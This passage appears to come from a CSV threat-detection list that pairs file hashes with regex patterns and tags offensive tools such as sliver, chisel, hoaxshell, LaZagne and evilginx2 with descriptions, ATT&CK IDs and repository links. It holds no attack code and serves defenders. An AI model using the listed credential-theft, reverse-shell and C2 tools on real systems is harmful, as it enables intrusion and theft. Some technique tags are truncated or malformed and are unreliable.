T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8c484c384d66dd2821b9f1d4f963ae897fbf539b2ab495f3e93344635eb76f18*",".{0,1000}8c484c384d66dd2821b9f1d4f963ae897fbf539b2ab495f3e93344635eb76f18.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*8c71bcc0680bd7c69fd58639a6748d26202caab6d639f9b92eb394e6648bce0e*",".{0,1000}8c71bcc0680bd7c69fd58639a6748d26202caab6d639f9b92eb394e6648bce0e.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*8c7bda923eb22fbe0961f2bb9585ceaac8e0c447116ec87979ae44b6a2699ac1*",".{0,1000}8c7bda923eb22fbe0961f2bb9585ceaac8e0c447116ec87979ae44b6a2699ac1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8c7d64cec00aafa23884f1bb28337ef6ce49f2f90605800217f635526e38541d*",".{0,1000}8c7d64cec00aafa23884f1bb28337ef6ce49f2f90605800217f635526e38541d.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*8c936f3b5bcd9dbb20a4d0602cdf26fbf3efe681134f20e510acda6561526623*",".{0,1000}8c936f3b5bcd9dbb20a4d0602cdf26fbf3efe681134f20e510acda6561526623.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8cb1ea0098cf975a1ad6d61b2a387f8acf09ef8576ea836f838aa6ac9c0fb0fb*",".{0,1000}8cb1ea0098cf975a1ad6d61b2a387f8acf09ef8576ea836f838aa6ac9c0fb0fb.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*8cb79a0a047793ff81319d7e4999732f8fcc49fbb2ba76f9ac38abf988c3eed8*",".{0,1000}8cb79a0a047793ff81319d7e4999732f8fcc49fbb2ba76f9ac38abf988c3eed8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8ccc989ac8dfc5453a486361a7850f1add7e2f7dfe4016840671e8c183ed887a*",".{0,1000}8ccc989ac8dfc5453a486361a7850f1add7e2f7dfe4016840671e8c183ed887a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8cd0ff4a46caae1508aaa14d69ac3393f05d2e58a1fd94d8c8b45a3ed6a6a474*",".{0,1000}8cd0ff4a46caae1508aaa14d69ac3393f05d2e58a1fd94d8c8b45a3ed6a6a474.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*8d013a3cd78fc557c13657fbdf62382cace60d05dc73868184db4a5573bca34e*",".{0,1000}8d013a3cd78fc557c13657fbdf62382cace60d05dc73868184db4a5573bca34e.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*8d0cbb7280381d6847295ae41a30dd19afb7a27141b95918561e52dbcc458182*",".{0,1000}8d0cbb7280381d6847295ae41a30dd19afb7a27141b95918561e52dbcc458182.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*8d0dac6d636eb3acfab0fd50442a8d404251266bcaf175eb4c119917e7ba32bc*",".{0,1000}8d0dac6d636eb3acfab0fd50442a8d404251266bcaf175eb4c119917e7ba32bc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8d1f3e17106324aad99a98f5dd921db9d27a620b37cadc06a4c470f4404dfca2*",".{0,1000}8d1f3e17106324aad99a98f5dd921db9d27a620b37cadc06a4c470f4404dfca2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*8d246f76d57dfa40f287d6d37f3a43c343b67c5db31f728d4568f2d8ed2d2799*",".{0,1000}8d246f76d57dfa40f287d6d37f3a43c343b67c5db31f728d4568f2d8ed2d2799.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8d2b6767f4a99a2bf89c412dd27424aeaf9f79ccd0640ab1257168c895c85f36*",".{0,1000}8d2b6767f4a99a2bf89c412dd27424aeaf9f79ccd0640ab1257168c895c85f36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8d3129341c603fa22b052f925fdf3bef054327c081299140d3c484f76254ca87*",".{0,1000}8d3129341c603fa22b052f925fdf3bef054327c081299140d3c484f76254ca87.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8d3945448815d156c064445585aa7cf51a5c30e9f96d7598e8ca323815f9aee3*",".{0,1000}8d3945448815d156c064445585aa7cf51a5c30e9f96d7598e8ca323815f9aee3.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","0","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z" "*8d87231f69d0fdeb63b10141cba62e31cc0fb16a105fda66fbd77f06e9d98feb*",".{0,1000}8d87231f69d0fdeb63b10141cba62e31cc0fb16a105fda66fbd77f06e9d98feb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8dacc97038a845b73c4f156f3fb4d00ef5b4cfa7a8e6b10e0bd8e5c918d62fd1*",".{0,1000}8dacc97038a845b73c4f156f3fb4d00ef5b4cfa7a8e6b10e0bd8e5c918d62fd1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8dca31ac3cffeacb63b9f572bb9f4b53481e51d1d74269168834c395725f0b6e*",".{0,1000}8dca31ac3cffeacb63b9f572bb9f4b53481e51d1d74269168834c395725f0b6e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8dd0633df72aacd10c634a263f6b1ade7195508e79993681e0800527ddfd86ef*",".{0,1000}8dd0633df72aacd10c634a263f6b1ade7195508e79993681e0800527ddfd86ef.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*8ddfdad7d1865d85b87670ebf29a4fef1f3cc42cef56d1785c8ecc21cef6e55c*",".{0,1000}8ddfdad7d1865d85b87670ebf29a4fef1f3cc42cef56d1785c8ecc21cef6e55c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8dece0ec5b60725419e384b317c5be3c15d3cc12c1c7da28a53ec344118f9cd9*",".{0,1000}8dece0ec5b60725419e384b317c5be3c15d3cc12c1c7da28a53ec344118f9cd9.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*8e029c31e7cbb4c481a10a27514bbaf746323fc251c002d132eaf374aae26206*",".{0,1000}8e029c31e7cbb4c481a10a27514bbaf746323fc251c002d132eaf374aae26206.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8e068fd6cafac177fcf10e61a2672c0e572180bc20270e47e55525ad027d729d*",".{0,1000}8e068fd6cafac177fcf10e61a2672c0e572180bc20270e47e55525ad027d729d.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*8e222919847637b1a4c781f780722a7ab32a1e3d310b91496fec82fa38952409*",".{0,1000}8e222919847637b1a4c781f780722a7ab32a1e3d310b91496fec82fa38952409.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8e348a738400c38f4fe75a08f7b63e290f4b06204552190f910d39e24e61c89a*",".{0,1000}8e348a738400c38f4fe75a08f7b63e290f4b06204552190f910d39e24e61c89a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8e7eaf585d3bc9f87159ff49850b074c42a7b192ce6540b06ed04ded87ba0d92*",".{0,1000}8e7eaf585d3bc9f87159ff49850b074c42a7b192ce6540b06ed04ded87ba0d92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8e81fd470bb1b6091600ba95f951405e35c9ee980ef34dbe6525a5aa0a672448*",".{0,1000}8e81fd470bb1b6091600ba95f951405e35c9ee980ef34dbe6525a5aa0a672448.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8eb06c672abfaf7de3d0f8b077737415d22b502f08160180771f8b6aa5f65545*",".{0,1000}8eb06c672abfaf7de3d0f8b077737415d22b502f08160180771f8b6aa5f65545.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8ebc87ad08296cb20668cd2d4c3a5a5cdd847100f3e5cf559d1b48ebae32959b*",".{0,1000}8ebc87ad08296cb20668cd2d4c3a5a5cdd847100f3e5cf559d1b48ebae32959b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*8ef891d6334629876c3c94569c9c35acd3b3d2b6930ee1c90086d715e120a40c*",".{0,1000}8ef891d6334629876c3c94569c9c35acd3b3d2b6930ee1c90086d715e120a40c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8efd5b8fbdba3db4ebd783214b56dae23e329eae2c7b1ce36aa59f0726cd35a0*",".{0,1000}8efd5b8fbdba3db4ebd783214b56dae23e329eae2c7b1ce36aa59f0726cd35a0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8F018213-4136-4D97-9084-F0346BBED04F*",".{0,1000}8F018213\-4136\-4D97\-9084\-F0346BBED04F.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*8F018213-4136-4D97-9084-F0346BBED04F*",".{0,1000}8F018213\-4136\-4D97\-9084\-F0346BBED04F.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*8f13ce758ca663d93b81c6db2c658cade683058012e65cbb066a82dac4f58311*",".{0,1000}8f13ce758ca663d93b81c6db2c658cade683058012e65cbb066a82dac4f58311.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8f1c38bd7991da18509ef47cf01ebb1f1527acce08a9a0b25f46f70486bd5132*",".{0,1000}8f1c38bd7991da18509ef47cf01ebb1f1527acce08a9a0b25f46f70486bd5132.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*8f2a1d66e0a532a030da8e0e646f866ea91ee987ffb33b36d95f64a0538a3e20*",".{0,1000}8f2a1d66e0a532a030da8e0e646f866ea91ee987ffb33b36d95f64a0538a3e20.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*8f31909ad50984539183ebd099eceed04617e520d44c8ef0081a114aa8d5ed01*",".{0,1000}8f31909ad50984539183ebd099eceed04617e520d44c8ef0081a114aa8d5ed01.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8f3fc1278c3632af8725bc717de00833c6710b955372756f30b4ed0a6cccdd0f*",".{0,1000}8f3fc1278c3632af8725bc717de00833c6710b955372756f30b4ed0a6cccdd0f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8f6fd0bc95fcbefdfa01a3f7e809914696bc1285a7f7bc39c3bbd1d2314b8299*",".{0,1000}8f6fd0bc95fcbefdfa01a3f7e809914696bc1285a7f7bc39c3bbd1d2314b8299.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*8f98671d7d96d0e04df6f8510a65f4cdf1fdea2978a0e0a67c998274c40051de*",".{0,1000}8f98671d7d96d0e04df6f8510a65f4cdf1fdea2978a0e0a67c998274c40051de.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 